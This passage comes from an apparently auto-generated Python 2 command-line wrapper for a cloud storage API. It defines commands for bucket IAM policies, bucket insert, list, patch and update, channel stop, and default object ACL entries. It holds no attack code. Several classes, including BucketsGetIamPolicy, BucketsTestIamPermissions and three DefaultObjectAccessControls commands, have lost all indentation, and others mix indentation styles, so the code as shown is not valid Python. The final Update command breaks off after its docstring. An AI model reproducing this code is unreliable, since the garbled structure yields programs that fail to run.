            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketsGetIamPolicy(apitools_base_cli.NewCmd):
"""Command wrapping buckets.GetIamPolicy."""
usage = """buckets_getIamPolicy <bucket>"""
def __init__(self, name, fv):
super(BucketsGetIamPolicy, self).__init__(name, fv)
def RunWithArgs(self, bucket):
"""Returns an IAM policy for the specified bucket.
Args:
bucket: Name of a bucket.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsGetIamPolicyRequest(
bucket=bucket.decode('utf8'),
)
result = client.buckets.GetIamPolicy(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsInsert(apitools_base_cli.NewCmd):
    """Command wrapping buckets.Insert."""

    usage = """buckets_insert <project>"""

    def __init__(self, name, fv):
        super(BucketsInsert, self).__init__(name, fv)
        # 'bucket' carries the request body as a JSON string (parsed in
        # RunWithArgs via JsonToMessage).
        flags.DEFINE_string(
            'bucket',
            None,
            u'A Bucket resource to be passed as the request body.',
            flag_values=fv)
        flags.DEFINE_enum(
            'predefinedAcl',
            u'authenticatedRead',
            [u'authenticatedRead', u'private', u'projectPrivate', u'publicRead', u'publicReadWrite'],
            u'Apply a predefined set of access controls to this bucket.',
            flag_values=fv)
        flags.DEFINE_enum(
            'predefinedDefaultObjectAcl',
            u'authenticatedRead',
            [u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
            u'Apply a predefined set of default object access controls to this '
            u'bucket.',
            flag_values=fv)
        flags.DEFINE_enum(
            'projection',
            u'full',
            [u'full', u'noAcl'],
            u'Set of properties to return. Defaults to noAcl, unless the bucket '
            u'resource specifies acl or defaultObjectAcl properties, when it '
            u'defaults to full.',
            flag_values=fv)

    def RunWithArgs(self, project):
        """Creates a new bucket.

        Args:
          project: A valid API project identifier.

        Flags:
          bucket: A Bucket resource to be passed as the request body.
          predefinedAcl: Apply a predefined set of access controls to this bucket.
          predefinedDefaultObjectAcl: Apply a predefined set of default object
            access controls to this bucket.
          projection: Set of properties to return. Defaults to noAcl, unless the
            bucket resource specifies acl or defaultObjectAcl properties, when it
            defaults to full.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.StorageBucketsInsertRequest(
            project=project.decode('utf8'),
        )
        # Copy only explicitly-set flags; enums are converted to the request
        # message's enum types, and 'bucket' is parsed from JSON.
        if FLAGS['bucket'].present:
            request.bucket = apitools_base.JsonToMessage(messages.Bucket, FLAGS.bucket)
        if FLAGS['predefinedAcl'].present:
            request.predefinedAcl = messages.StorageBucketsInsertRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
        if FLAGS['predefinedDefaultObjectAcl'].present:
            request.predefinedDefaultObjectAcl = messages.StorageBucketsInsertRequest.PredefinedDefaultObjectAclValueValuesEnum(FLAGS.predefinedDefaultObjectAcl)
        if FLAGS['projection'].present:
            request.projection = messages.StorageBucketsInsertRequest.ProjectionValueValuesEnum(FLAGS.projection)
        result = client.buckets.Insert(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketsList(apitools_base_cli.NewCmd):
    """Command wrapping buckets.List."""

    usage = """buckets_list <project>"""

    def __init__(self, name, fv):
        super(BucketsList, self).__init__(name, fv)
        flags.DEFINE_integer(
            'maxResults',
            None,
            u'Maximum number of buckets to return.',
            flag_values=fv)
        flags.DEFINE_string(
            'pageToken',
            None,
            u'A previously-returned page token representing part of the larger '
            u'set of results to view.',
            flag_values=fv)
        flags.DEFINE_string(
            'prefix',
            None,
            u'Filter results to buckets whose names begin with this prefix.',
            flag_values=fv)
        flags.DEFINE_enum(
            'projection',
            u'full',
            [u'full', u'noAcl'],
            u'Set of properties to return. Defaults to noAcl.',
            flag_values=fv)

    def RunWithArgs(self, project):
        """Retrieves a list of buckets for a given project.

        Args:
          project: A valid API project identifier.

        Flags:
          maxResults: Maximum number of buckets to return.
          pageToken: A previously-returned page token representing part of the
            larger set of results to view.
          prefix: Filter results to buckets whose names begin with this prefix.
          projection: Set of properties to return. Defaults to noAcl.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.StorageBucketsListRequest(
            project=project.decode('utf8'),
        )
        # Copy only explicitly-set flags into the request message.
        # maxResults is an integer flag and needs no decoding.
        if FLAGS['maxResults'].present:
            request.maxResults = FLAGS.maxResults
        if FLAGS['pageToken'].present:
            request.pageToken = FLAGS.pageToken.decode('utf8')
        if FLAGS['prefix'].present:
            request.prefix = FLAGS.prefix.decode('utf8')
        if FLAGS['projection'].present:
            request.projection = messages.StorageBucketsListRequest.ProjectionValueValuesEnum(FLAGS.projection)
        result = client.buckets.List(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketsPatch(apitools_base_cli.NewCmd):
    """Command wrapping buckets.Patch."""

    usage = """buckets_patch <bucket>"""

    def __init__(self, name, fv):
        super(BucketsPatch, self).__init__(name, fv)
        # 'bucketResource' carries the request body as a JSON string (parsed
        # in RunWithArgs via JsonToMessage).
        flags.DEFINE_string(
            'bucketResource',
            None,
            u'A Bucket resource to be passed as the request body.',
            flag_values=fv)
        flags.DEFINE_string(
            'ifMetagenerationMatch',
            None,
            u'Makes the return of the bucket metadata conditional on whether the '
            u"bucket's current metageneration matches the given value.",
            flag_values=fv)
        flags.DEFINE_string(
            'ifMetagenerationNotMatch',
            None,
            u'Makes the return of the bucket metadata conditional on whether the '
            u"bucket's current metageneration does not match the given value.",
            flag_values=fv)
        flags.DEFINE_enum(
            'predefinedAcl',
            u'authenticatedRead',
            [u'authenticatedRead', u'private', u'projectPrivate', u'publicRead', u'publicReadWrite'],
            u'Apply a predefined set of access controls to this bucket.',
            flag_values=fv)
        flags.DEFINE_enum(
            'predefinedDefaultObjectAcl',
            u'authenticatedRead',
            [u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
            u'Apply a predefined set of default object access controls to this '
            u'bucket.',
            flag_values=fv)
        flags.DEFINE_enum(
            'projection',
            u'full',
            [u'full', u'noAcl'],
            u'Set of properties to return. Defaults to full.',
            flag_values=fv)

    def RunWithArgs(self, bucket):
        """Updates a bucket. This method supports patch semantics.

        Args:
          bucket: Name of a bucket.

        Flags:
          bucketResource: A Bucket resource to be passed as the request body.
          ifMetagenerationMatch: Makes the return of the bucket metadata
            conditional on whether the bucket's current metageneration matches the
            given value.
          ifMetagenerationNotMatch: Makes the return of the bucket metadata
            conditional on whether the bucket's current metageneration does not
            match the given value.
          predefinedAcl: Apply a predefined set of access controls to this bucket.
          predefinedDefaultObjectAcl: Apply a predefined set of default object
            access controls to this bucket.
          projection: Set of properties to return. Defaults to full.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.StorageBucketsPatchRequest(
            bucket=bucket.decode('utf8'),
        )
        # Copy only explicitly-set flags; string preconditions become ints,
        # enum flags become the request message's enum types, and
        # 'bucketResource' is parsed from JSON.
        if FLAGS['bucketResource'].present:
            request.bucketResource = apitools_base.JsonToMessage(messages.Bucket, FLAGS.bucketResource)
        if FLAGS['ifMetagenerationMatch'].present:
            request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
        if FLAGS['ifMetagenerationNotMatch'].present:
            request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
        if FLAGS['predefinedAcl'].present:
            request.predefinedAcl = messages.StorageBucketsPatchRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
        if FLAGS['predefinedDefaultObjectAcl'].present:
            request.predefinedDefaultObjectAcl = messages.StorageBucketsPatchRequest.PredefinedDefaultObjectAclValueValuesEnum(FLAGS.predefinedDefaultObjectAcl)
        if FLAGS['projection'].present:
            request.projection = messages.StorageBucketsPatchRequest.ProjectionValueValuesEnum(FLAGS.projection)
        result = client.buckets.Patch(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketsSetIamPolicy(apitools_base_cli.NewCmd):
    """Command wrapping buckets.SetIamPolicy."""

    usage = """buckets_setIamPolicy <bucket>"""

    def __init__(self, name, fv):
        super(BucketsSetIamPolicy, self).__init__(name, fv)
        # 'policy' carries the request body as a JSON string (parsed in
        # RunWithArgs via JsonToMessage).
        flags.DEFINE_string(
            'policy',
            None,
            u'A Policy resource to be passed as the request body.',
            flag_values=fv)

    def RunWithArgs(self, bucket):
        """Updates an IAM policy for the specified bucket.

        Args:
          bucket: Name of a bucket.

        Flags:
          policy: A Policy resource to be passed as the request body.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.StorageBucketsSetIamPolicyRequest(
            bucket=bucket.decode('utf8'),
        )
        if FLAGS['policy'].present:
            request.policy = apitools_base.JsonToMessage(messages.Policy, FLAGS.policy)
        result = client.buckets.SetIamPolicy(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketsTestIamPermissions(apitools_base_cli.NewCmd):
"""Command wrapping buckets.TestIamPermissions."""
usage = """buckets_testIamPermissions <bucket> <permissions>"""
def __init__(self, name, fv):
super(BucketsTestIamPermissions, self).__init__(name, fv)
def RunWithArgs(self, bucket, permissions):
"""Tests a set of permissions on the given bucket to see which, if any,
are held by the caller.
Args:
bucket: Name of a bucket.
permissions: Permissions to test.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsTestIamPermissionsRequest(
bucket=bucket.decode('utf8'),
permissions=permissions.decode('utf8'),
)
result = client.buckets.TestIamPermissions(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsUpdate(apitools_base_cli.NewCmd):
    """Command wrapping buckets.Update."""

    usage = """buckets_update <bucket>"""

    def __init__(self, name, fv):
        super(BucketsUpdate, self).__init__(name, fv)
        # 'bucketResource' carries the request body as a JSON string (parsed
        # in RunWithArgs via JsonToMessage).
        flags.DEFINE_string(
            'bucketResource',
            None,
            u'A Bucket resource to be passed as the request body.',
            flag_values=fv)
        flags.DEFINE_string(
            'ifMetagenerationMatch',
            None,
            u'Makes the return of the bucket metadata conditional on whether the '
            u"bucket's current metageneration matches the given value.",
            flag_values=fv)
        flags.DEFINE_string(
            'ifMetagenerationNotMatch',
            None,
            u'Makes the return of the bucket metadata conditional on whether the '
            u"bucket's current metageneration does not match the given value.",
            flag_values=fv)
        flags.DEFINE_enum(
            'predefinedAcl',
            u'authenticatedRead',
            [u'authenticatedRead', u'private', u'projectPrivate', u'publicRead', u'publicReadWrite'],
            u'Apply a predefined set of access controls to this bucket.',
            flag_values=fv)
        flags.DEFINE_enum(
            'predefinedDefaultObjectAcl',
            u'authenticatedRead',
            [u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
            u'Apply a predefined set of default object access controls to this '
            u'bucket.',
            flag_values=fv)
        flags.DEFINE_enum(
            'projection',
            u'full',
            [u'full', u'noAcl'],
            u'Set of properties to return. Defaults to full.',
            flag_values=fv)

    def RunWithArgs(self, bucket):
        """Updates a bucket.

        Args:
          bucket: Name of a bucket.

        Flags:
          bucketResource: A Bucket resource to be passed as the request body.
          ifMetagenerationMatch: Makes the return of the bucket metadata
            conditional on whether the bucket's current metageneration matches the
            given value.
          ifMetagenerationNotMatch: Makes the return of the bucket metadata
            conditional on whether the bucket's current metageneration does not
            match the given value.
          predefinedAcl: Apply a predefined set of access controls to this bucket.
          predefinedDefaultObjectAcl: Apply a predefined set of default object
            access controls to this bucket.
          projection: Set of properties to return. Defaults to full.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.StorageBucketsUpdateRequest(
            bucket=bucket.decode('utf8'),
        )
        # Copy only explicitly-set flags; string preconditions become ints,
        # enum flags become the request message's enum types, and
        # 'bucketResource' is parsed from JSON.
        if FLAGS['bucketResource'].present:
            request.bucketResource = apitools_base.JsonToMessage(messages.Bucket, FLAGS.bucketResource)
        if FLAGS['ifMetagenerationMatch'].present:
            request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
        if FLAGS['ifMetagenerationNotMatch'].present:
            request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
        if FLAGS['predefinedAcl'].present:
            request.predefinedAcl = messages.StorageBucketsUpdateRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
        if FLAGS['predefinedDefaultObjectAcl'].present:
            request.predefinedDefaultObjectAcl = messages.StorageBucketsUpdateRequest.PredefinedDefaultObjectAclValueValuesEnum(FLAGS.predefinedDefaultObjectAcl)
        if FLAGS['projection'].present:
            request.projection = messages.StorageBucketsUpdateRequest.ProjectionValueValuesEnum(FLAGS.projection)
        result = client.buckets.Update(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class ChannelsStop(apitools_base_cli.NewCmd):
  """Command wrapping channels.Stop."""
  usage = """channels_stop"""
  def __init__(self, name, fv):
    super(ChannelsStop, self).__init__(name, fv)
    # All Channel fields are optional flags; the request body is the Channel
    # message itself (no positional arguments for this command).
    flags.DEFINE_string(
        'address',
        None,
        u'The address where notifications are delivered for this channel.',
        flag_values=fv)
    flags.DEFINE_string(
        'expiration',
        None,
        u'Date and time of notification channel expiration, expressed as a '
        u'Unix timestamp, in milliseconds. Optional.',
        flag_values=fv)
    flags.DEFINE_string(
        'id',
        None,
        u'A UUID or similar unique string that identifies this channel.',
        flag_values=fv)
    flags.DEFINE_string(
        'kind',
        u'api#channel',
        u'Identifies this as a notification channel used to watch for changes'
        u' to a resource. Value: the fixed string "api#channel".',
        flag_values=fv)
    flags.DEFINE_string(
        'params',
        None,
        u'Additional parameters controlling delivery channel behavior. '
        u'Optional.',
        flag_values=fv)
    flags.DEFINE_boolean(
        'payload',
        None,
        u'A Boolean value to indicate whether payload is wanted. Optional.',
        flag_values=fv)
    flags.DEFINE_string(
        'resourceId',
        None,
        u'An opaque ID that identifies the resource being watched on this '
        u'channel. Stable across different API versions.',
        flag_values=fv)
    flags.DEFINE_string(
        'resourceUri',
        None,
        u'A version-specific identifier for the watched resource.',
        flag_values=fv)
    flags.DEFINE_string(
        'token',
        None,
        u'An arbitrary string delivered to the target address with each '
        u'notification delivered over this channel. Optional.',
        flag_values=fv)
    flags.DEFINE_string(
        'type',
        None,
        u'The type of delivery mechanism used for this channel.',
        flag_values=fv)
  def RunWithArgs(self):
    """Stop watching resources through this channel
    Flags:
      address: The address where notifications are delivered for this channel.
      expiration: Date and time of notification channel expiration, expressed
        as a Unix timestamp, in milliseconds. Optional.
      id: A UUID or similar unique string that identifies this channel.
      kind: Identifies this as a notification channel used to watch for
        changes to a resource. Value: the fixed string "api#channel".
      params: Additional parameters controlling delivery channel behavior.
        Optional.
      payload: A Boolean value to indicate whether payload is wanted.
        Optional.
      resourceId: An opaque ID that identifies the resource being watched on
        this channel. Stable across different API versions.
      resourceUri: A version-specific identifier for the watched resource.
      token: An arbitrary string delivered to the target address with each
        notification delivered over this channel. Optional.
      type: The type of delivery mechanism used for this channel.
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    request = messages.Channel(
    )
    # Only fields whose flags were explicitly set are attached; note that the
    # 'kind' default ('api#channel') is therefore not sent unless passed.
    if FLAGS['address'].present:
      request.address = FLAGS.address.decode('utf8')
    if FLAGS['expiration'].present:
      # Expiration is a millisecond Unix timestamp carried as an integer.
      request.expiration = int(FLAGS.expiration)
    if FLAGS['id'].present:
      request.id = FLAGS.id.decode('utf8')
    if FLAGS['kind'].present:
      request.kind = FLAGS.kind.decode('utf8')
    if FLAGS['params'].present:
      # 'params' arrives as a JSON string and is parsed into the message type.
      request.params = apitools_base.JsonToMessage(messages.Channel.ParamsValue, FLAGS.params)
    if FLAGS['payload'].present:
      request.payload = FLAGS.payload
    if FLAGS['resourceId'].present:
      request.resourceId = FLAGS.resourceId.decode('utf8')
    if FLAGS['resourceUri'].present:
      request.resourceUri = FLAGS.resourceUri.decode('utf8')
    if FLAGS['token'].present:
      request.token = FLAGS.token.decode('utf8')
    if FLAGS['type'].present:
      request.type = FLAGS.type.decode('utf8')
    result = client.channels.Stop(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsDelete(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.Delete."""
usage = """defaultObjectAccessControls_delete <bucket> <entity>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsDelete, self).__init__(name, fv)
def RunWithArgs(self, bucket, entity):
"""Permanently deletes the default object ACL entry for the specified
entity on the specified bucket.
Args:
bucket: Name of a bucket.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageDefaultObjectAccessControlsDeleteRequest(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
result = client.defaultObjectAccessControls.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsGet(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.Get."""
usage = """defaultObjectAccessControls_get <bucket> <entity>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsGet, self).__init__(name, fv)
def RunWithArgs(self, bucket, entity):
"""Returns the default object ACL entry for the specified entity on the
specified bucket.
Args:
bucket: Name of a bucket.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageDefaultObjectAccessControlsGetRequest(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
result = client.defaultObjectAccessControls.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsInsert(apitools_base_cli.NewCmd):
  """Command wrapping defaultObjectAccessControls.Insert."""
  usage = """defaultObjectAccessControls_insert <bucket>"""
  def __init__(self, name, fv):
    super(DefaultObjectAccessControlsInsert, self).__init__(name, fv)
    # The request body is an ObjectAccessControl message; every field except
    # the positional 'bucket' is exposed as an optional flag on fv.
    flags.DEFINE_string(
        'domain',
        None,
        u'The domain associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'email',
        None,
        u'The email address associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'entity',
        None,
        u'The entity holding the permission, in one of the following forms: '
        u'- user-userId - user-email - group-groupId - group-email - '
        u'domain-domain - project-team-projectId - allUsers - '
        u'allAuthenticatedUsers Examples: - The user liz@example.com would '
        u'be user-liz@example.com. - The group example@googlegroups.com '
        u'would be group-example@googlegroups.com. - To refer to all members'
        u' of the Google Apps for Business domain example.com, the entity '
        u'would be domain-example.com.',
        flag_values=fv)
    flags.DEFINE_string(
        'entityId',
        None,
        u'The ID for the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'etag',
        None,
        u'HTTP 1.1 Entity tag for the access-control entry.',
        flag_values=fv)
    flags.DEFINE_string(
        'generation',
        None,
        u'The content generation of the object.',
        flag_values=fv)
    flags.DEFINE_string(
        'id',
        None,
        u'The ID of the access-control entry.',
        flag_values=fv)
    flags.DEFINE_string(
        'kind',
        u'storage#objectAccessControl',
        u'The kind of item this is. For object access control entries, this '
        u'is always storage#objectAccessControl.',
        flag_values=fv)
    flags.DEFINE_string(
        'object',
        None,
        u'The name of the object.',
        flag_values=fv)
    flags.DEFINE_string(
        'projectTeam',
        None,
        u'The project team associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'role',
        None,
        u'The access permission for the entity. Can be READER or OWNER.',
        flag_values=fv)
    flags.DEFINE_string(
        'selfLink',
        None,
        u'The link to this access-control entry.',
        flag_values=fv)
  def RunWithArgs(self, bucket):
    """Creates a new default object ACL entry on the specified bucket.
    Args:
      bucket: The name of the bucket.
    Flags:
      domain: The domain associated with the entity, if any.
      email: The email address associated with the entity, if any.
      entity: The entity holding the permission, in one of the following
        forms: - user-userId - user-email - group-groupId - group-email -
        domain-domain - project-team-projectId - allUsers -
        allAuthenticatedUsers Examples: - The user liz@example.com would be
        user-liz@example.com. - The group example@googlegroups.com would be
        group-example@googlegroups.com. - To refer to all members of the
        Google Apps for Business domain example.com, the entity would be
        domain-example.com.
      entityId: The ID for the entity, if any.
      etag: HTTP 1.1 Entity tag for the access-control entry.
      generation: The content generation of the object.
      id: The ID of the access-control entry.
      kind: The kind of item this is. For object access control entries, this
        is always storage#objectAccessControl.
      object: The name of the object.
      projectTeam: The project team associated with the entity, if any.
      role: The access permission for the entity. Can be READER or OWNER.
      selfLink: The link to this access-control entry.
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    request = messages.ObjectAccessControl(
        bucket=bucket.decode('utf8'),
    )
    # Copy only flags the user explicitly set (.present); defaults such as
    # kind='storage#objectAccessControl' are not sent unless passed.
    if FLAGS['domain'].present:
      request.domain = FLAGS.domain.decode('utf8')
    if FLAGS['email'].present:
      request.email = FLAGS.email.decode('utf8')
    if FLAGS['entity'].present:
      request.entity = FLAGS.entity.decode('utf8')
    if FLAGS['entityId'].present:
      request.entityId = FLAGS.entityId.decode('utf8')
    if FLAGS['etag'].present:
      request.etag = FLAGS.etag.decode('utf8')
    if FLAGS['generation'].present:
      request.generation = int(FLAGS.generation)
    if FLAGS['id'].present:
      request.id = FLAGS.id.decode('utf8')
    if FLAGS['kind'].present:
      request.kind = FLAGS.kind.decode('utf8')
    if FLAGS['object'].present:
      request.object = FLAGS.object.decode('utf8')
    if FLAGS['projectTeam'].present:
      # 'projectTeam' is supplied as a JSON string and parsed into the
      # nested message type.
      request.projectTeam = apitools_base.JsonToMessage(messages.ObjectAccessControl.ProjectTeamValue, FLAGS.projectTeam)
    if FLAGS['role'].present:
      request.role = FLAGS.role.decode('utf8')
    if FLAGS['selfLink'].present:
      request.selfLink = FLAGS.selfLink.decode('utf8')
    result = client.defaultObjectAccessControls.Insert(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsList(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.List."""
usage = """defaultObjectAccessControls_list <bucket>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsList, self).__init__(name, fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u"If present, only return default ACL listing if the bucket's current"
u' metageneration matches this value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u"If present, only return default ACL listing if the bucket's current"
u' metageneration does not match the given value.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Retrieves default object ACL entries on the specified bucket.
Args:
bucket: Name of a bucket.
Flags:
ifMetagenerationMatch: If present, only return default ACL listing if
the bucket's current metageneration matches this value.
ifMetagenerationNotMatch: If present, only return default ACL listing if
the bucket's current metageneration does not match the given value.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageDefaultObjectAccessControlsListRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
result = client.defaultObjectAccessControls.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsPatch(apitools_base_cli.NewCmd):
  """Command wrapping defaultObjectAccessControls.Patch."""
  usage = """defaultObjectAccessControls_patch <bucket> <entity>"""
  def __init__(self, name, fv):
    super(DefaultObjectAccessControlsPatch, self).__init__(name, fv)
    # The request body is an ObjectAccessControl message; 'bucket' and
    # 'entity' are positional, all other fields are optional flags on fv.
    flags.DEFINE_string(
        'domain',
        None,
        u'The domain associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'email',
        None,
        u'The email address associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'entityId',
        None,
        u'The ID for the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'etag',
        None,
        u'HTTP 1.1 Entity tag for the access-control entry.',
        flag_values=fv)
    flags.DEFINE_string(
        'generation',
        None,
        u'The content generation of the object.',
        flag_values=fv)
    flags.DEFINE_string(
        'id',
        None,
        u'The ID of the access-control entry.',
        flag_values=fv)
    flags.DEFINE_string(
        'kind',
        u'storage#objectAccessControl',
        u'The kind of item this is. For object access control entries, this '
        u'is always storage#objectAccessControl.',
        flag_values=fv)
    flags.DEFINE_string(
        'object',
        None,
        u'The name of the object.',
        flag_values=fv)
    flags.DEFINE_string(
        'projectTeam',
        None,
        u'The project team associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'role',
        None,
        u'The access permission for the entity. Can be READER or OWNER.',
        flag_values=fv)
    flags.DEFINE_string(
        'selfLink',
        None,
        u'The link to this access-control entry.',
        flag_values=fv)
  def RunWithArgs(self, bucket, entity):
    """Updates a default object ACL entry on the specified bucket. This method
    supports patch semantics.
    Args:
      bucket: The name of the bucket.
      entity: The entity holding the permission, in one of the following
        forms: - user-userId - user-email - group-groupId - group-email -
        domain-domain - project-team-projectId - allUsers -
        allAuthenticatedUsers Examples: - The user liz@example.com would be
        user-liz@example.com. - The group example@googlegroups.com would be
        group-example@googlegroups.com. - To refer to all members of the
        Google Apps for Business domain example.com, the entity would be
        domain-example.com.
    Flags:
      domain: The domain associated with the entity, if any.
      email: The email address associated with the entity, if any.
      entityId: The ID for the entity, if any.
      etag: HTTP 1.1 Entity tag for the access-control entry.
      generation: The content generation of the object.
      id: The ID of the access-control entry.
      kind: The kind of item this is. For object access control entries, this
        is always storage#objectAccessControl.
      object: The name of the object.
      projectTeam: The project team associated with the entity, if any.
      role: The access permission for the entity. Can be READER or OWNER.
      selfLink: The link to this access-control entry.
    """
    client = GetClientFromFlags()
    global_params = GetGlobalParamsFromFlags()
    request = messages.ObjectAccessControl(
        bucket=bucket.decode('utf8'),
        entity=entity.decode('utf8'),
    )
    # Patch semantics: only fields whose flags were explicitly set (.present)
    # are included in the request body.
    if FLAGS['domain'].present:
      request.domain = FLAGS.domain.decode('utf8')
    if FLAGS['email'].present:
      request.email = FLAGS.email.decode('utf8')
    if FLAGS['entityId'].present:
      request.entityId = FLAGS.entityId.decode('utf8')
    if FLAGS['etag'].present:
      request.etag = FLAGS.etag.decode('utf8')
    if FLAGS['generation'].present:
      request.generation = int(FLAGS.generation)
    if FLAGS['id'].present:
      request.id = FLAGS.id.decode('utf8')
    if FLAGS['kind'].present:
      request.kind = FLAGS.kind.decode('utf8')
    if FLAGS['object'].present:
      request.object = FLAGS.object.decode('utf8')
    if FLAGS['projectTeam'].present:
      # 'projectTeam' is supplied as a JSON string and parsed into the
      # nested message type.
      request.projectTeam = apitools_base.JsonToMessage(messages.ObjectAccessControl.ProjectTeamValue, FLAGS.projectTeam)
    if FLAGS['role'].present:
      request.role = FLAGS.role.decode('utf8')
    if FLAGS['selfLink'].present:
      request.selfLink = FLAGS.selfLink.decode('utf8')
    result = client.defaultObjectAccessControls.Patch(
        request, global_params=global_params)
    print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsUpdate(apitools_base_cli.NewCmd):
  """Command wrapping defaultObjectAccessControls.Update."""
  usage = """defaultObjectAccessControls_update <bucket> <entity>"""
  def __init__(self, name, fv):
    super(DefaultObjectAccessControlsUpdate, self).__init__(name, fv)
    # Same flag surface as the Patch command; only the wrapped API method
    # (Update, full-replace semantics) differs.
    flags.DEFINE_string(
        'domain',
        None,
        u'The domain associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'email',
        None,
        u'The email address associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'entityId',
        None,
        u'The ID for the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'etag',
        None,
        u'HTTP 1.1 Entity tag for the access-control entry.',
        flag_values=fv)
    flags.DEFINE_string(
        'generation',
        None,
        u'The content generation of the object.',
        flag_values=fv)
    flags.DEFINE_string(
        'id',
        None,
        u'The ID of the access-control entry.',
        flag_values=fv)
    flags.DEFINE_string(
        'kind',
        u'storage#objectAccessControl',
        u'The kind of item this is. For object access control entries, this '
        u'is always storage#objectAccessControl.',
        flag_values=fv)
    flags.DEFINE_string(
        'object',
        None,
        u'The name of the object.',
        flag_values=fv)
    flags.DEFINE_string(
        'projectTeam',
        None,
        u'The project team associated with the entity, if any.',
        flag_values=fv)
    flags.DEFINE_string(
        'role',
        None,
        u'The access permission for the entity. Can be READER or OWNER.',
        flag_values=fv)
    flags.DEFINE_string(
        'selfLink',
        None,
        u'The link to this access-control entry.',
        flag_values=fv)
  def RunWithArgs(self, bucket, entity):
    """Updates a default object ACL entry on the specified bucket.
    Args:
      bucket: The name of the bucket.
      entity: The entity holding the permission, in one of the following
        forms: - user-userId - user-email - group-groupId - group-email -
        domain-domain - project-team-projectId - allUsers -
        allAuthenticatedUsers Examples: - The user liz@example.com would be
        user-liz@example.com. - The group example@googlegroups.com would be
        group-example@googlegroups.com. - To refer to all members of the
        Google Apps for Business domain example.com, the entity would be
        domain-example.com.
    Flags:
      domain: The domain associated with the entity, if any.
      email: The email address associated with the entity, if any.
      entityId: The ID for the entity, if any.
      etag: HTTP 1.1 Entity tag for the access-control entry.
      generation: The content generation of the object.
      id: The ID of the access-control entry.
      kind: The kind of item this is. For object access control entries, this
        is always storage#objectAccessControl.
      object: The name of the object.
      projectTeam: The project team associated with the entity, if any.
      role: The access permission for the entity. Can be READER or OWNER.
      selfLink: The link to this access-control entry.
    """
